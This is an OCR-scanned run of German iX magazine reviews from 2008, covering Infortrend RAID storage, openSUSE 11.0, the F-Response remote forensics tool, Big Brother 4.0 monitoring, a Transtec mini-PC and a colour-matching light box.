mit je 2x 4-GBitFC, 1x seriell, 1 x GE- 
Management-Port, 1 x Mini-SAS-Expansion- 
Port für JBODs, 512 MByte ECC-SDRAM, bat- 
teriegepuffert; 2 Netzteile; Kabel: 2 x Strom, 
1x seriell, 1x GE 

Preis (ohne HDs]: 6000 Euro 


Eonstor B12S-R1030; 


SAS-to-SAS-RAID-System I U; 12 2,5"-SAS-Ein- 
schübe; Frontdisplay; 2 SAS-to-SAS-Controller 
mit je 2x 12-GBit-Mini-SAS (x4, extern], 

1 x seriell, 1 x GE-Management-Port, 

1 x Mini-SAS-Expansion-Port für JBODs, 

512 MByte ECC-SDRAM, batteriegepuffert; 

2 Netzteile; Kabel: 2 x Strom, 1 x seriell, 
1x GE;2x Mini-SAS-auf-Mini-SAS 

Preis (ohne HDs]: 5800 Euro 


Eonstor B125-J1000R:; 


1-U-SAS-JBOD für 12 2,5"-SAS-HDs; 2 I/O- 
Controller mit je 2X Mini-SAS (Daisy Chain]; 
2 Netzteile; Kabel: 2 x Strom, 2 x Mini-SAS- 
auf-Mini-SAS 

Preis (ohne HDs]: 3100 Euro 

Hersteller: Infortrend, www.infortrend.com 
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Linux 


Opensuse vor allem im deutsch- 

sprachigen Raum immer noch zu 
den beliebtesten Linux-Varianten. Das 
belegt auch der große Ansturm auf die 
Version 11.0: Mehr als 163 TByte 
Traffic verursachte der Download in 
den ersten 30 Stunden bei Novell — 
ähnlich dürfte es bei den Mirror-Ser- 
vern ausgesehen haben. 

Opensuse steht wieder als Kaufver- 
sion oder als DVD-Image für x86-, 
x86_64- oder PowerPC-Systeme bereit. 
Novells für 2009 erwartetes Enterprise- 
Linux (SLES 11) wird auf Opensuses 
l1er-Familie basieren. Für x86-Besitzer 
könnte sich die mit Erscheinen dieser 
Ausgabe verfügbare Variante Open- 
suse 11.0 VorKon aus dem Millin-Ver- 
lag lohnen (siehe „Daten und Preise“). 
Sie enthält zusätzlich unter anderem 
Treiber - beispielsweise für Nvidia-Gra- 
fikkarten —, Multimedia-Erweiterungen 
sowie ein Farbmanagementsystem mit 
ICC-Profilen für den Photoshop-Clone 
Cinepaint. 


T rotz der Erfolge von Ubuntu zählt 


Opensuse 11.0 


Software: 


Kernel 2.6.25.5 (2.6.25.9'), Glibc 2.8, 

Xen 3.2.1, X.org 7.3, GCC 4.3, Gnome 2.22, 
KDE 3.5.9/4.0.4, XFCE 4.4.2, Openoffice 2.4.0, 
Firefox 3.0, Thunderbird 2.0.0.12 [2.0.0.14'] 
Bezugsquellen und Preise: 

c't special Linux: 
www.heise.de/kiosk/special/ct/08/05 8,50 €? 
Opensuse 11.0 VorKon: 
www.millin.de 19,95 €? 
Opensuse Download-/Boxed-Version: 
www.opensuse.org/suseshop.de —/ 59,95 €? 


via Online-Update, ? inkl. MwSt. 
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In komplett neuem Design erstrahlt 
der Installer. Die Optik wirkt nun erheb- 
lich freundlicher als bisher. Wie üblich 
kommt man mit der „automatischen 
Konfiguration“ in wenigen Schritten ans 
Ziel. Im Test trug der Installer ein paral- 
lel installiertes Ubuntu 7.10 allerdings 
nicht im Bootloader ein. In etwa 15 Mi- 
nuten spielt der Assistent die Software 
ein. Dies ist erheblich schneller im Ver- 
gleich zum Vorgänger, da er nun Ima- 
ges statt einzelner Pakete einspielt. Auch 
sind die Pakete selbst deutlich kleiner, 
denn die Entwickler haben von bzip2- 
auf /zma-Kompression umgestellt. Im 
Test klappte die Hardware-Erkennung 
mit einem Dell Inspiron 1525 und einem 
Sony Vaio VGN-NR2I1S recht gut. 

Erwartungsgemäß wartet die geliefer- 
te Software mit aktuellen Versionsstän- 
den auf: KDE 4.04, Gnome 2.22, X.org 
7.3, der Kernel 2.6.25.5 sowie Glibc 2.8 
und GCC 4.3. Zum Lieferumfang gehört 
auch KDE 3.5.9, mit dem Novell die 
Zeit bis zur Freigabe von KDE 4.1 über- 
brücken will. Dennoch ist in Opensuse 
11 für KDE Version 4 der Standard. Mit 
Xen 3.2.1 und Virtualbox 1.5.6 sind ak- 
tuelle Virtualisierer ebenfalls dabei. 

Eine häufig an der 10er-Serie geübte 
Kritik betraf die träge Paketverwaltung. 
Zwar hatten die Entwickler in Opensuse 
10.3 schon einiges verbessert, in der 
Release 11.0 krempelten sie die Soft- 
wareverwaltung komplett um. Statt 
der gewohnten XML-Dateien mit den 
Metadaten für rpm (yum) kommt das 
neue wörterbuchbasierte Solv-Format 
zum Einsatz. Das reduziert die Größe 
des Paketdepots auf rund ein Drittel, 
was zu spürbar flotterem Verhalten 
führt. Die Softwareverwaltung erfolgt 
nun mit dem grafischen zypp und nicht 
mehr via yum. Weiter integriert es die 
für diverse Paktverwaltungssysteme 


Opensuse 11.0 auch mit KDE 4 


Renoviert 


Markus Franz 


Novells freier Sprössling erfreut sich trotz 
zunehmender Distributionskonkurrenz immer noch 
großer Beliebtheit. Das gilt auch für die Version 
11.0, die jetzt KDE 4 als Desktop-Option anbietet. 


verfügbaren Schnittstellen des Package- 
kit-Projekts. Darüber können Anwen- 
dungen abstrahiert auf die Paketverwal- 
tung der Distribution zugreifen. Selbst 
in YaST sieht die Softwareverwaltung 
nun deutlich übersichtlicher aus. 

Im Bereich Systemsicherheit zeigt 
Novell, für welche Zielgruppen Open- 
suse 11.0 ausgelegt ist: für Heiman- 
wender und Entwickler, aber nicht für 
professionelle Umgebungen. Zwar star- 
tet die Firewall automatisch, jedoch 
bleibt AppArmor standardmäßig ausge- 
schaltet. Ohne konkrete Hinweise ist es 
dann schwierig, den Dienst zu starten. 
Daneben unterminiert die Version 11.0 
auch das Root-Konzept von Linux: Je- 
der neue Benutzer kann administrative 
Änderungen am System durchführen. 
Das ist zwar bequem, aber gefährlich. 

Zumindest in YaST hat ein überar- 
beiteter Assistent zur Systemsicherheit 
Einzug gehalten: Sowohl Dateiberech- 
tigungen als auch Passwortlänge oder 
automatischer Login lassen sich hier 
komfortabel anpassen. 


Fazit 


Opensuse 11.0 ist eine Linux-Distribu- 
tion mit aktuellem Softwarestand, bei 
der oberflächlich das neue KDE be- 
sticht. Unter der Haube haben Novell 
und die Community viel an der Paket- 
verwaltung gearbeitet, was besonders er- 
fahrenen Anwendern entgegenkommt. 
Leider verliert die Sicherheit etwas 
gegenüber der Benutzerfreundlichkeit. 
Mit etwas Handarbeit bietet Opensuse 
11.0 dennoch eine sichere Plattform für 
Arbeit und Multimedia im privaten Um- 


feld oder für Entwickler. (avr) 
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Review U Computerforensik 


FF F-Response Remote Forensics Field Kit = \e] x] 
File 
-Host Information - 
EN r status | 
Hostnamei nn nn ne 
Online 


Host IP Address: | 192.168.217.128 “| 


Remote Configuration 
TCP Port: | 6666 TCP Port must be between 1025 and 65,554 


Username: ageschoi Username must be 8 characters 


Password: [essen Password must be 14 characters 


Version: 1.16 
\_ License Key HW ID; 155519018 


=» |] 


Live-Analyse mit F-Response 


Entfernt 
analysieren 


Alexander Geschonneck 


Wenn der Zugriff auf die Festplatte eines Systems oder das 
Erstellen eines Image erforderlich, aber nicht möglich ist, 
müssen Alternativen her. Das neue F-Response soll andere 
Live-Analyse-Werkzeuge in den Schatten stellen. 


ei der Analyse von Sicherheits- 
B vorfällen oder Computerstraftaten 

ist es oft unumgänglich, die Fest- 
platten des verdächtigen Systems aus- 
zuwerten. Üblicherweise erstellen die 
Ermittler bei diesem Post-mortem-Ana- 
lyse genannten Verfahren eine Datenträ- 
gerkopie oder greifen schreibgeschützt 
auf die Festplatte direkt zu. 

Ist das verdächtige System nur über 
das Netz erreichbar, oder kommt ein 
Ausbau der Festplatte nicht infrage, 
müssen andere Methoden her. Der ame- 
rikanische Hersteller Agile Risk Ma- 
nagement (www .agilerm.net) liefert mit 
seinem Werkzeug F-Response ein Hilfs- 
mittel, mit dem man im Rahmen von 
forensischen Untersuchungen auf die 
logischen, die physikalischen und die 
RAW-Datenträger eines verdächtigen 
Windows-Systems über das Netz zu- 
greifen kann. 
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Der Fernzugriff auf den Datenträger 
des verdächtigen Systems erfolgt über 
Microsofts iSCSI-Initiator (siehe iX- 
Link), den man bei Windows-XP- oder 
-2000-Systemen zusätzlich installieren 
muss. Er muss allerdings nur auf dem 
System des Ermittlers installiert werden. 
Er kommuniziert via IP mit der auf dem 
verdächtigen System laufenden Foren- 
siksoftware F-Response. 


Einbinden des 
verdächtigen Systems 


Für den Zugriff auf das zu analysieren- 
de System - in diesem Test ein W2k- 
Server, analysiert von einem System 
mit Windows XP — muss der Benutzer 
der Software in den Eigenschaften des 
iSCSI-Konfigurators die entsprechen- 
den Parameter wie IP-Adresse des ver- 


dächtigen Systems, TCP-Port, Benut- 
zername und Passwort eingeben. Dieser 
findet sich in der Systemsteuerung. Die 
Authentifizierung erfolgt mit Bordmit- 
teln per CHAP (Challenge Handshake 
Authentication Protocol). 

Damit er die Datenträger des ver- 
dächtigen Systems analysieren kann, 
startet der Ermittler die aus einer .exe- 
Datei bestehende Anwendung. Die er- 
staunlich übersichtlich gehaltene gra- 
fische Oberfläche lässt bei mehreren 
Netzwerk-Interfaces die Auswahl von 
IP-Adresse und einen frei wählbaren, 
nicht definierten hohen TCP-Port zu, der 
Verbindungen entgegennimmt. Anzuge- 
ben sind außerdem Benutzername und 
Passwort. 

Bei Eingabe der letzten beiden gelten 
strenge Restriktionen: Der Benutzer- 
name muss 8 Zeichen und das Passwort 
14 Zeichen lang sein (siehe Aufmacher). 
Nachdem F-Response auf dem verdäch- 
tigen System läuft, kann der Ermittler 
über den iSCSI-Initiator des Analyse- 
systems eine Verbindung aufbauen. Nun 
stehen die Laufwerke des verdächtigen 
Systems ebenfalls auf dem Analysesys- 
tem zur Verfügung — sowohl die logi- 
schen als auch die physikalischen. 

Ist F-Response auf dem verdächti- 
gen System gestartet, verhindert die 
Software jede Veränderung der Daten 
durch die Analysetätigkeiten des Er- 
mittlers. Allerdings hinterlassen das Ein- 
stecken des USB-Lizenz-Dongles und 
der Start der Software in der Registry 
und dem Dateisystem Spuren. 


Ermittlertätigkeiten 
nicht sichtbar 


F-Response gibt es in drei unterschied- 
lichen Versionen. Mit der F-Response 
Field Kit Edition kann man immer nur 
ein System gleichzeitig analysieren, da 
der USB-Lizenz-Dongle in der verdäch- 
tigen Maschine stecken muss. Man kann 
allerdings von mehreren Analysesys- 
temen darauf zugreifen. Die Consul- 
tant Edition ermöglicht die gleichzeitige 
 Datenund Preise 
F-Response 


Hersteller: Agile Risk Management LLC; 
Vertrieb in Deutschland über X-Ways 

Website: www.Fresponse.com; www.x-ways.net 
Preise: Field Kit Edition: 199,90 € 

Consultant Edition: 999,90 € 

Enterprise Edition: 3219,90 € 
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Analyse von mehreren Systemen über 
das Netz. Der Lizenz-Dongle befindet 
sich in dem Fall am Analyserechner 
des Ermittlers. 

Mit der Enterprise Edition lassen sich 
mehrere verdächtige Systeme gleichzei- 
tig untersuchen. Dabei ist die Analyse 
über einen zentralen Server möglich, um 
mehreren Ermittlern einen verteilten Zu- 
griff auf die verdächtigen Systeme zu 
gewähren. Die auf Letzteren befindliche 
Software ist auch als Kommandozeilen- 


® komfortabler Remote-Zugriff auf die 
Datenträger eines verdächtigen 
Systems 


©® Originaldaten werden nicht verändert 


©® durch eigene Forensik- und Live- 
Response-Tools beliebig erweiterbar 


© Zeitstempel auf dem verdächtigen 
System können durch Dongle-Installa- 
tion und Start der Software verändert 


version verfügbar, damit sie beispiels- 
weise als Dienst laufen kann. So kön- 
nen die Ermittler unter anderem ihre 
Analysetätigkeiten verstecken. 

Das ganze Vorgehen klingt zunächst 
recht unspektakulär. Betrachtet man 
aber die Möglichkeiten, die sich für 
den Forensiker daraus ergeben, so 
überzeugt dieses einfache Konzept. 
Stehen dem Ermittler nun sämtliche 
Laufwerke des verdächtigen Systems 
schreibgeschützt auf seinem Analyse- 
system zur Verfügung, kann er viele 
Analyseschritte durchführen: etwa eine 
forensische Datenträgerkopie erstellen, 
mit einem Virenscanner nach Malware 
suchen oder einfach für die sogenannte 
„Electronic Discovery“ alle Dateien 
indexieren. 

Im Vergleich zu anderen Ansätzen 
besticht F-Response durch seine Ein- 
fachheit, seine Erweiterbarkeit und die 
verhältnismäßig moderaten Investitions- 
kosten. Trifft ein Ermittler auf Syste- 
me, deren Festplatte er nicht ausbauen 
kann oder die nicht gebootet werden 
dürfen, ist F-Response eine sehr prak- 


Eigenschaften von i$CSI Initiator 


© The iSCSI protocol uses the following information to unique) 
idlentify this initiator and authenticate targets 


Im iSCSI-Initiator muss der Ermittler 
das System, das er untersuchen will, 
nebst relevanten Informationen wie 
Benutzername, Passwort et cetera 
einfügen (Abb. 1). 


ALEXANDER GESCHONNECK 


leitet den Bereich Forensic Technology 
& Discovery Services bei Ernst & Young. 
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General | Discovery | Targets | Persistent Targets | Bound Volumes/D evioes | 


Initiator Node Name: ageschol 

To tename the initiator node, click Change, 
To authenticate targets using CHAP, check Secret to 

specily a CHAP secret [see _) 
To conligure IPSec Tunnel Made addresses, click T. 

Tunnel Zumel 


Systemmanagement 


Big Brother 4.0: 


Netz-Monitoring per Flash-Oberfläche 


Bruder schafft 


Marco Horner 
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Transterrng data from 192.168,178.28, 


Im Mai 2008 hat Quest Software den Vertrieb der Ausgabe 
4.0 seiner Überwachungssoftware Big Brother gestartet. 

Der Hersteller wirbt unter anderem mit einer Flash-Oberfläche, 
Anbindung an Datenbanken, Unterstützung von SNMP-Traps, 
Client und Server für Mac OS X sowie einer Vielzahl von 


Erweiterungen. 


as von Robert-Andre Croteau 
D und Sean MacGuire ursprünglich 

als Open-Source-Software entwi- 
ckelte Monitoring-Werkzeug zur Über- 
wachung zahlreicher Anwendungen 
und Architekturen hat Quest Software 
im Jahr 2002 gekauft. Seitdem sind 
zwei Versionen erhältlich: die durch 
Quest Software vertriebene kommer- 
zielle „Professional Edition“ (www. 
bb4.com) und die auf dem Server der 
Entwickler seit Ende 2005 anscheinend 
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nicht mehr weiterentwickelte Open- 
Source-Version (www.bb4.net). Etliche 
Anwender setzen daher auf die Alterna- 
tive „Hobbit“ (hobbitmon.sourceforge. 
net). Big Brother war bereits im Jahr 
2003 Gegenstand eines iX-Tests [1], 
Grund genug, die aktuelle kommerzielle 
Version näher zu betrachten. 

Quest Software bietet die kommer- 
zielle Suite Big Brother als eine 30- 
tägige Trial-Version auf ihrer Webseite 
an. Nach dieser Frist muss eine Lizen- 


zierung erfolgen. Zulässig sind neuer- 
dings nur solche Anwender, die keine 
Adresse bei einem der gängigen Free- 
mail-Hoster nutzen. Quest möchte da- 
mit offenbar die Qualität seines Marke- 
ting-Datenbestandes steigern. 

Die seitens Quest Software bereitge- 
stellten Client- und Serversysteme um- 
fassen Windows 2000, 2003 und XP, 
HP-UX 11.0/11.1, IBM AIX 5.1 bis 5.3, 
Red Hat Enterprise Server 3.0 bis 5.0, 
Sun Solaris 5.8, 5.9, 10 (auch x86), Suse 
Linux 9 und 10 sowie Mac OS X 10/ 
Darwin 9.2. Insbesondere die Client- 
und Server-Versionen für Mac OS X 
und Solaris i386 sind interessante Er- 
weiterungen des bisherigen Abde- 
ckungsbereichs. Für nicht aufgeführte 
Linux-Versionen schlägt der Hersteller 
Red Hat Enterprise Server 3.0 für den 
Kernel 2.4 respektive RHES 4.0 oder 
5.0 für den 2.6er-Kernel vor. 

Unabhängig von der Zielarchitektur 
lässt sich positiv die Teilung von Client- 
und Server-Paketen sowie die Doku- 
mentation pro Paket feststellen. Zu- 
nächst muss die Software für den Server 
heruntergeladen werden. Es empfiehlt 
sich aber bereits zu diesem Zeitpunkt, 
die Client-Version, die „Release Notes“ 
und die „Getting Started Guides“ so- 
wohl für den Server als auch den Client 
pro Architektur herunterzuladen. Bei- 
spielsweise stehen für Solaris sowohl 
das Server- als auch das Client-Soft- 
warepaket als kompilierte TAR-Archi- 
ve zur Verfügung. Die „Getting Started 
Guides“ sind ein guter Einstieg in In- 
stallation und Erstkonfiguration der 
„Professional Edition“ und heben sich 
damit wesentlich von der Open Source 
Version ab. 


Server auspacken 


Gemäß der mitgelieferten Dokumenta- 
tion gehört der Server ins Heimatver- 
zeichnis des Benutzers „bb“, das später 
ausgeführte Konfigurationsskript lässt 
aber auch andere Parameter zu. Für das 
Anzeigen der Statusmeldungen dient 
nach wie vor ein Webserver. Im Falle 
eines Apache ist es wichtig, falls nö- 
tig die Konfigurationsdatei htipd.conf 
anzupassen sowie die Lokationen der 
Verzeichnisse htdocs und cgi-bin zu 
kennen, da hier das Konfigurations- 
Skript Dateien ablegt. Die vorbildliche 
Dokumentation kann als Checkliste 
herhalten. 

Wird des Server-Archiv im gewähl- 
ten Verzeichnis entpackt, entsteht ein 
Verzeichnis bb4.00-bbpe, dessen voll- 
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ständigen Verzeichnisnamen die Vari- 
able „BBHOME“ festlegt. 

Nach dem Ausführen des Konfigura- 
tionsskripts $BBHOMEI/install/bbconfig 
als Root geht es um die Umgebung des 
Servers. BB kopiert automatisch die 
notwendigen Dateien in die Webserver- 
Verzeichnisse und legt symbolische 
Links an. Auch die für den Fall eines 
Reboot notwendigen Startskripts wer- 
den — anders als bei der Open-Source- 
Version — erzeugt und an den richtigen 
Stellen im Dateisystem abgelegt. Am 
Ende des Konfigurationsdialoges gibt 
BB einen String für die Beschaffung 
der Lizenz aus, den sich der Admin auf- 
schreiben sollte. Als Abschluss erfolgt 
der erste Start der Server-Software. 

Ohne Erwähnung bleibt im „Getting 
Started Guide“ eine saubere Definition 
der Variablen „LD-LIBRARY_PATH“, 
die das lib-Verzeichnis des GCC-Com- 
pilers enthalten muss. Andernfalls ter- 
miniert der Server sofort mit der Fehler- 
meldung in $BBHOME/BBOUT: 


Id.so.1: bbd: fatal: libgcc_s.so.1: open failed: 7 


xx%* 


Nosuch file or directory *** 7 
BBSERVER STARTUP FAILED *** 


Nach dem ersten Start der Software be- 
nötigt der Server zunächst einige Minu- 
ten, die ersten eigenen Tests und Web- 
seiten aufzubauen. Der Webserver 
stellt dies bereits mit einem ersten 
Startbild in Graustufen dar, das sich 
nach einigen Minuten in das bekannte 
Bild in Ampelfarben (rot/gelb/grün) 
wandelt. Dabei fällt die schnellere Ge- 
staltung der Webseiten auf: Der Zeit- 
bedarf zur Erzeugung der Statusseiten 
sank von fünf auf zwei Minuten. 


Aussagekräftige 
Hilfefunktion 


Akute Störungen oder Verfügbarkeits- 
reports lassen sich wie gewohnt durch 
Anklicken der durch Bilder repräsen- 
tierten Links in der oberen linken Ecke 
erstellen. Neu hingegen sind das direk- 
te Editieren von Konfigurationsdateien 
als berechtigter Benutzer und die On- 
linehilfe. Besonders Letztere ist gut ge- 
lungen und gibt dem Administrator 
nützliche Hinweise im Fehlerfall. Sie 
ähnelt der Windows-Hilfe und erlaubt 
eine Stichwortsuche. 
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Die gegenüber dem neuen Flash-Inter- 
face (siehe Aufmacherbild) ziemlich 
bieder erscheinende Windows-Ober- 
fläche hat Quest Software gegenüber 
der Vorgängerversion um einige 
Systemabfragen erweitert (Abb. 1). 
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Systemmanagement 


Grün ist gut, rot ist schlecht - mit 
schlichten Ampelfarben gewährt Big 
Brother einen raschen Überblick über 
den Zustand der überwachten 
Gerätschaften (Abb. 2). 


Aufgrund der Trennung des Servers 
vom Client benötigt auch der Server 
seinen eigenen Client. Erst dann las- 
sen sich lokale Tests wie die Ermitt- 
lung von CPU-Ressourcen, Festplat- 
ten-Auslastung oder die Überwachung 
von Prozessen durchführen. Für den 
Client steht ein separater „Getting 
Started Guide“ zur Verfügung. Nach 
dem Entpacken der Software im dafür 
vorgesehenen Verzeichnis nimmt das 
Konfigurationsskript alle notwendigen 
Einstellungen vor, am Ende erfolgt der 
Start. Eine der zentralen Dateien zur 
Steuerung der überwachten Clients 
liegt auf dem Server: $BBHOME/ 
etc/bb-hosts, die der Admin vor dem 
Verteilen der Client-Software jeweils 
um die neuen Clients erweitern muss. 
So lassen sich lila (purple) gekenn- 
zeichnete Zustände vermeiden, die ei- 
ne Störung der Kommunikation im 
Big-Brother-System widerspiegeln. Es 
ist sinnvoll, die Datei bb-hosts auf al- 
len Clients aktuell zu halten. 

Art und Umfang der Unix-Clients ha- 
ben sich nicht wesentlich verändert. Der 
Windows-Client hat augenscheinlich ei- 
nige zusätzliche Tests bezüglich CPU 
und Speicher erhalten (Abb. 1). Erweite- 
rungen für Clients stehen nach wie vor 
auf www.deadcat.net zur Verfügung. 


Systemverwaltung 
mittels Flash 


An der Administration des Servers und 
der Clients haben die Entwickler nicht 
sehr viel gegenüber der Open-Source- 
Lösung geändert. Die Software lässt 
sich ähnlich anpassen wie bereits 2003 
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beschrieben [1]. Darüber hinaus gibt es 
einige Neuerungen. 

So steht nun zusätzlich zur bewähr- 
ten Webseiten-Ansicht des Big-Brother- 
Servers eine neue Flash-Oberfläche 
namens „Modern Edition“ zur Verfü- 
gung. Quest liefert sie in der Probier- 
version als „Prototype v1.0 Beta“ mit. 
Die Flash-Animation steht — ähnlich 
der regulären Status-Seite — praktisch 
sofort im Webbrowser zur Verfügung 
(unter bbf.html). Hapert es bei der Dar- 
stellung, könnte dies an einer unsaube- 
ren DNS-Konfiguration liegen. Die Hil- 
fe empfiehlt, auf dem Server die Datei 
$BBHOMEI/www/bbf.xml zu überprü- 
fen. In dieser Oberfläche ist es durch 
Verschiebung von Objekten bequem 
möglich, sich eine individuelle Sicht zu 
generieren (siehe Aufmacherbild). Auf 
dem Community-Server www.deadcat. 
net sind Erweiterungen für eine geogra- 
fische Ansicht erhältlich. 

Anders als die bisherigen Open- 
Source-Implementierungen von Big 
Brother, deren Anwender die SNMP- 
Trap-Unterstützung noch manuell hin- 
zufügen mussten, bringt die Professio- 
nal-Version den SNMP-Trap-Support 
von Haus aus mit. Lediglich an zwei 
Stellen sind Anpassungen nötig, wenn 
Big Brother seine Statusmeldungen bei 
Bedarf an ein übergeordnetes Netzma- 
nagement-System (NMS) senden soll. 
Innerhalb der Verzeichnisstruktur fin- 
den sich die Big-Brother-MIB (Ma- 
nagement Information Base), die im 
NMS als Umsetzungstabelle der Sys- 
tem-Object-Identifiers (sysOID) zu les- 
baren Meldungen führt. Beim Versen- 
den von SNMP-Traps dokumentierte die 
Datei BBOUT einen Fehler, der auf das 
Fehlen zusätzlicher abhängiger SNMP- 
MIBs im Verzeichnis $BBHOMEIJetc/ 
mibs hindeutete. Die Beseitigung er- 
folgt durch Kopieren der MIBs aus 
dem NetSNMP-Projekt, das die Grund- 
lage des SNMP-Trap-Supports in der 
Professional Version bildet. 


ZX-Wertung 


®& SNMP-Einbindung 

© Weboberfläche 

© Dokumentation 

© Erweiterbarkeit 

© Datenbank-Unterstützung 


© keine zentralisierte Konfiguration 


Wer zusätzlich zur recht nützlichen 
lokalen Ablage von Statistik-Daten 
auf dem Server solche zur Weiterver- 
arbeitung in einer Datenbank benötigt, 
kann dies neuerdings auf einfache 
Weise mit der Datenbank-Unterstützung 
für Oracle, MySQL und SQL-Server 
umsetzen. Ist erst einmal der ODBC- 
Treiber installiert, genügt in der Datei 
$BBHOMEIetc/bbdb.cfg der Schalter 
ENABLE_DB=yes. Je nach Datenbank- 
Typ liefert Quest Software das entspre- 
chende Create-Skript zum Anlegen der 
Tabellenspalten bei. 


Fazit 


Big Brother zeigt sich in Version 4.0 
spürbar gereift. Quest hat offenbar er- 
kannt, dass die Software in der Vergan- 
genheit recht spärlich dokumentiert und 
nur von Experten zu administrieren war. 
Der Funktionsumfang des Grundsys- 
tems hat sich nicht wesentlich verän- 
dert, es besteht weiterhin die Flexibilität, 
eigene Erweiterungen vorzunehmen. 
Zahlreiche Neuerungen, beispielsweise 
die Trennung von Server- und Client- 
Software, der SNMP-Trap-Support so- 
wie die automatische Anpassungen be- 
reits im Installationsprozess, runden 
das Bild einer „Professional Version“ 
ab. Auch die Flash-animierte Oberflä- 
che vermittelt einen guten und schnel- 
len Überblick. (un) 
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Big Brother 4.0 
Netzwerk-Monitoring-Werkzeug 


Hersteller: Quest Software, www.bb4.com 
unterstützte Systeme: Windows 2000, 2003 
und XP, HP-UX 11.0/11.i, IBM AIX 5.1 bis 5.3, 
Red Hat Enterprise Server 3.0 bis 5.0, Sun 
Solaris 5.8, 5.9, 10 (auch x86], Suse Linux 9 
und 10 sowie Mac OS X 10/Darwin 9.2 
Preise: ab 905 Euro [Server mit 25 Node- 


Lizenzen) 


A 
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Mini-PC 


Kompakter Rechner für den Arbeitsplatz 


Kraftzwerg 


Ralph Hülsenbusch 


Je kleiner, je leiser und je sparsamer 

im Verbrauch, desto höher ist der 

Reiz von Mini-PCs vor allem für Arbeits- 
plätze, an denen der persönliche Rechner 
allenfalls durch Zurückhaltung auffallen sollte. 
Transtec will mit dem Senyo 610 solche Ansprüche erfüllen. 


eit die Chipschmieden immer 
5 kompaktere Eisen im Feuer haben, 

beginnt der PC zu schrumpfen. So- 
lange man nicht auf das integrierte 
CD/DVD-Laufwerk verzichten möch- 
te, setzt der Radius der Silberscheiben 
die Grenzen. Transtec, Tübingen, hat 
seine Modellreihe der Kompakten nach 
unten ausgebaut, was die Größe und 
den Preis angeht. Der neue Senyo 610 
unterbietet den im Januar in der iX vor- 
gestellten Senyo 710 [1] in sämtlichen 
Gehäusemaßen, aber nicht in der Aus- 
stattung. Im Vergleich zum Mac Mini 
beansprucht er mehr Grundfläche, ist 


Stromverbrauch 
und Lautheit 


EEE 0,12 
 (),/.5 


BE Standb: 
EEE Leerlau 
Last 


Der Senyo 610 ist mit 0,45 sone aus- 
gesprochen leise, das Netzteil aber 
hat einen schlechten Wirkungsgrad. 
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dafür aber um rund I cm flacher und 
kann mit mehr Speicher und schnelle- 
ren CPUs aufwarten, was allerdings ins 
Geld geht. 

Was in das kleine Gerät passt, setzt 
mit dem Santa Rosa Chipsatz neue 
Maßstäbe in der Maximalausstattung: 
Core 2 Duo Prozessor T9500 mit 2,6 
GHz, 4 GByte RAM und 250-GByte- 
Festplatte. Zum Test lieferte Transtec 
den Senyo 610 in moderater Ausstat- 
tung: mit einem 2,1 GHz schnellen 
T8100 und 2GByte RAM. Auf der 2,5 
Zoll großen SATA-Festplatte mit 80 
GByte Kapazität hatte Transtec multi- 
boot-fähig Suse Linux Enterprise Desk- 
top 10, Patchlevel 1, Windows XP SP2 
und Windows Vista untergebracht. 

Das Versprechen des geringen Ener- 
gieverbrauchs stimmt, denn der Senyo 
610 kommt bei der Konfiguration 
selbst unter Last mit 37 Watt aus, dafür 
holt das Steckernetzteil aber fast 60 VA 
aus dem Stromnetz — ein Dilemma, 
das fast schon typisch für die kleinen 
Schwarzen ist und an dem sich seit An- 
fang des Jahres nichts geändert hat. Zu 
hören ist der Mini nur beim Hochfah- 
ren, wenn die Lüfter kurz durchatmen, 
oder wenn er sich auf einem optischen 
Medium zurechtzufinden versucht. Die 
Verwendung eines CD-Laufwerks mit 
automatischen Einzug mag umstritten 
sein; im Test kam es jedenfalls zu kei- 
nen Kratzern. 

Während der Arbeit und selbst bei 
grafischen Lasten, für die SPECs 
Viewperf, Second Life und Google 
Earth herhalten mussten, bleibt der Se- 
nyo 610 ruhig und wohltemperiert. Mit 


der Grafik on-board, der Doppelherz- 
CPU und dem wohlbemessenen Spei- 
cher von 2 GByte kommt ein flüssiges 
Arbeiten zustande, auch wenn die CPU 
mit 2,1 GHz nicht zu den Roadrunnern 
gehört. 80 GByte Plattenplatz mögen in 
Anbetracht heutiger Kapazitäten von 
SATA-Platten etwas wenig sein — da ist 
mehr drin. Und obwohl die Seagate 
ST980811AS als recht laut verschrien 
ist, hat Transtec die Geräuschdämmung 
gut in den Griff bekommen: Im Mess- 
labor der c’t kam der Senyo 610 unter 
Volllast auf eine Lautheit von 0,45 so- 
ne, was knapp über dem Geräuschpe- 
gel eines sehr ruhigen Zimmers liegt 
(de.wikipedia.org/wiki/Sone). 


Fazit 


Mit der Ausstattung, vor allem was die 
Schnittstellen S-Video, DVI und opti- 
scher Audio-Anschluss angeht, passt 
der Senyo 610 nicht nur hinter den 
Counter in die Empfangshalle, in die 
Arztpraxis oder ins Büro, sondern auch 
ins Wohnzimmer als kleine Medien- 
zentrale. Der Antritt gegen den Klassi- 
ker Mac Mini gerät mit 711 Euro (inkl. 
MwSt.) eine Stufe zu hoch, denn der ist 
ab 479 Euro zu haben und kommt mit 


Fernsteuerung ins Haus. (rh) 
Literatur 
[1] Ralph Hülsenbusch; Desktop- 
Rechner; Im Stillen; Lüfterloser 
Tischrechner Senyo 710 von 
Transtec; iX 1/2008, S. 81 IR 
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Grafikhardware 


Normlichtbox mit Schnittstelle zur 
Monitorkalibrierung 


Schlaue Kiste 


Dieter Michel 


Ein Farbabgleich ist sowohl in Druckereien als auch 
in der Druckvorstufe unverzichtbar. Der Hersteller von 
Normlichtboxen Just versucht nun, mit dem Color 
Communicator2 die Druckwerkbetrachtung in den 
Farbmanagement-Workflow zu integrieren. 


unst ist schön, macht aber viel Ar- 
KK: wusste Karl Valentin bereits 

vor 100 Jahren. Das wissen auch 
heute noch Agenturen und Druckereien, 
wenn es darum geht, auf dem Computer 
erstellte Druckvorlagen ohne ungewollte 
visuelle Veränderungen in ein Druck- 
werk zu verwandeln. „What you see is 
what you get‘ funktioniert nämlich nur, 
wenn die Wiedergabecharakteristiken 
von Computerbildschirm und Druckaus- 
gabe genau aufeinander abgestimmt 
sind. Gerade beim Offsetdruck, bei dem 
das Einrichten der Druckmaschinen ei- 
nen deutlichen Anteil der Kosten aus- 
macht, möchte man die Wirkung des 
späteren Druckwerks bereits vorher 
möglichst präzise beurteilen können. 
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Die Farbwahrnehmung des mensch- 
lichen Auges hängt nicht nur von der 
Farbtemperatur der Lichtquelle (siehe 
Kasten „Farbtemperatur“), sondern auch 
von Farben und Helligkeitswerten in 
der Umgebung ab. Sogenannte Norm- 
lichtboxen schaffen definierte Betrach- 
tungsbedingungen zur Farbabmuste- 
rung in der Druckvorstufe und der 
